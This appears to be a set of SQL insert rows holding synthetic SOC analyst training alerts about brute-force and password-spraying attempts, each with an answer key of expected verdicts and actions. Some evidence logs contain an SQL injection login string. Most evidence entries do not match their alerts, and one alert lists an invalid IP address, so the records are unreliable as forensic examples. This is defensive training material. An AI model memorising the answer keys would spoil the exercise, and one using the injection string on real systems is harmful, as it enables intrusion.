(1655, 'Potential Password Spraying Detected', 'high', 'Elastic SIEM', 'A high number of failed login attempts from a single external IP address was detected. Possible password spraying attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:47:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.75\",\"dst_ip\":\"192.168.1.150\",\"username\":\"e.turner\",\"hostname\":\"intranet01\",\"failed_attempts\":40}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with password spraying activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Mapping\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target machine\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"e.turner\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP has been flagged for password spraying, confirming this as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:47:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"username\\\":\\\"e.turner\\\",\\\"hostname\\\":\\\"intranet01\\\",\\\"failed_attempts\\\":40}\"},{\"timestamp\":\"2026-03-15T20:57:15.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:47:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"username\\\":\\\"e.turner\\\",\\\"hostname\\\":\\\"intranet01\\\",\\\"failed_attempts\\\":40}\"},{\"timestamp\":\"2026-03-15T20:56:15.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:47:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"username\\\":\\\"e.turner\\\",\\\"hostname\\\":\\\"intranet01\\\",\\\"failed_attempts\\\":40}\"},{\"timestamp\":\"2026-03-15T20:55:15.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:47:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"username\\\":\\\"e.turner\\\",\\\"hostname\\\":\\\"intranet01\\\",\\\"failed_attempts\\\":40}\"},{\"timestamp\":\"2026-03-15T20:54:15.897Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:47:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"username\\\":\\\"e.turner\\\",\\\"hostname\\\":\\\"intranet01\\\",\\\"failed_attempts\\\":40}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1656, 'Unusual SSH Login Activity Detected', 'medium', 'Wazuh', 'Detected a spike in SSH login attempts from an IP address known for suspicious activities.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.51\",\"dst_ip\":\"10.0.0.10\",\"username\":\"root\",\"hostname\":\"sshserver02\",\"failed_attempts\":45}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.51\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP known for SSH brute force attempts reported 300 times\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the SSH server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is flagged for numerous brute force activities, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.898Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.51\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:57:15.898Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.51\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:56:15.898Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.51\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:55:15.898Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.51\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:54:15.898Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid 
user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.51\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"sshserver02\\\",\\\"failed_attempts\\\":45}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1657, 'Failed Password Spraying Attempt', 'medium', 'Splunk', 'A series of failed login attempts from an external IP address, indicating a potential password spraying attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:25:15Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.1.250\",\"username\":\"c.jones\",\"hostname\":\"authgateway01\",\"failed_attempts\":20}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple credential stuffing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.250\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal IT\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the authentication gateway\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"c.jones\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with known credential attacks, validating the alert.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.904Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:25:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.250\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"authgateway01\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-15T20:57:15.904Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:25:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.250\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"authgateway01\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-15T20:56:15.904Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:25:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.250\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"authgateway01\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-15T20:55:15.904Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:25:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.250\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"authgateway01\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-15T20:54:15.904Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:25:15Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.1.250\\\",\\\"username\\\":\\\"c.jones\\\",\\\"hostname\\\":\\\"authgateway01\\\",\\\"failed_attempts\\\":20}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1658, 'Suspicious SSH Login Attempts', 'critical', 'Azure Sentinel', 'Numerous failed SSH login attempts detected from a foreign IP address targeting internal servers.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:12:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.75\",\"dst_ip\":\"10.0.1.20\",\"username\":\"sysadmin\",\"hostname\":\"datacenter01\",\"failed_attempts\":50}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for suspicious SSH activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the data center server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"sysadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is flagged for suspicious SSH activities, confirming it as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:57:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:56:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:55:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:54:15.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed 
password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:12:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.75\\\",\\\"dst_ip\\\":\\\"10.0.1.20\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"datacenter01\\\",\\\"failed_attempts\\\":50}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1659, 'Failed Brute Force Attempt on Web Portal', 'medium', 'Elastic SIEM', 'Detected multiple failed login attempts from a known suspicious IP address targeting the company\'s web portal.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.150\",\"dst_ip\":\"192.168.1.300\",\"username\":\"b.adams\",\"hostname\":\"webapp01\",\"failed_attempts\":25}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.300\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Reports\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target web application\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"b.adams\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Management\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with unauthorized access attempts, confirming the alert.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:57:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:56:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:55:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:54:15.919Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:30:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.150\\\",\\\"dst_ip\\\":\\\"192.168.1.300\\\",\\\"username\\\":\\\"b.adams\\\",\\\"hostname\\\":\\\"webapp01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1660, 'Suspicious SSH Activity from Known Malicious IP', 'critical', 'Wazuh', 'Detected multiple failed SSH login attempts from an IP address with a history of malicious activity.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:15:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"10.0.0.15\",\"username\":\"administrator\",\"hostname\":\"sshserver03\",\"failed_attempts\":48}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 600 times for SSH brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the SSH server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is flagged for numerous brute force activities, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:57:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:56:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:55:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"},{\"timestamp\":\"2026-03-15T20:54:15.922Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.99\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"sshserver03\\\",\\\"failed_attempts\\\":48}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
